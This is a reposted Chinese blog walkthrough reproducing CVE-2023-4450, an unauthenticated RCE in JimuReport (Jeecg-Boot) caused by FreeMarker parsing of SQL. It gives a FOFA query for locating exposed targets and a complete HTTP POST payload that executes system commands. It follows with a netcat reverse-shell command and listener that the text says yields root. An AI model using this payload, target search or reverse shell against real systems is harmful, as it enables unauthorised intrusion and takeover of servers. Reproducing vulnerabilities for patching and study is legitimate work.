目录

jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现

jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

1.漏洞级别

高危

2.漏洞搜索

fofa

复制代码
app="Jeecg-Boot 企业级快速开发平台"

3.影响范围

复制代码
JimuReport < 1.6.1

4.漏洞复现

这个漏洞的注入点就在于/jeecg-boot/jmreport/queryFieldBySql 且无需用户授权即可执行

构造数据包

复制代码
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Type: application/json
Content-Length: 102

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami  \") }' "}

如果漏洞存在,则会出现以下内容:

如果命令失败则会显示:

漏洞相对简单,到这里就复现成功了。

4.2 进一步利用

如果想要进一步rce的话,可以通过nc的方法来反弹shell,执行

复制代码
nc -e /bin/bash ip port

远程服务器执行,即可正常获取shell

复制代码
nc -lvp 8888

成功getsshell,root权限

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
摸鱼也很难22 天前
JAVA组件的利用漏洞 && Shlr搜索引擎 && shiro身份 && Log4j日志
cve·漏洞复现·组件安全
摸鱼也很难23 天前
框架的CVE漏洞利用 && php类 && java类 && 手工操作和自动化操作&&蓝队分析漏洞利用的流量特征
cve·漏洞复现·蓝队流量分析
摘星怪sec3 个月前
【漏洞复现】|方正畅享全媒体新闻采编系统reportCenter.do/screen.do存在SQL注入
数据库·sql·web安全·媒体·漏洞复现
Mitch3114 个月前
【漏洞复现】CVE-2015-3337 Arbitrary File Reading
elasticsearch·网络安全·docker·漏洞复现
Mitch3114 个月前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
Mitch3114 个月前
【漏洞复现】CVE-2023-37461 Arbitrary File Writing
web安全·网络安全·prometheus·metersphere·漏洞复现
摘星怪sec5 个月前
【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传
网络安全·文件上传·漏洞复现
南暮思鸢6 个月前
HelloCTF [RCE-labs] Level 3 - 命令执行
经验分享·web安全·网络安全·php·知识分享·rce漏洞·rce-labs靶场
阿呆不呆@qq7 个月前
springblade-JWT认证缺陷漏洞CVE-2021-44910
cve·漏洞复现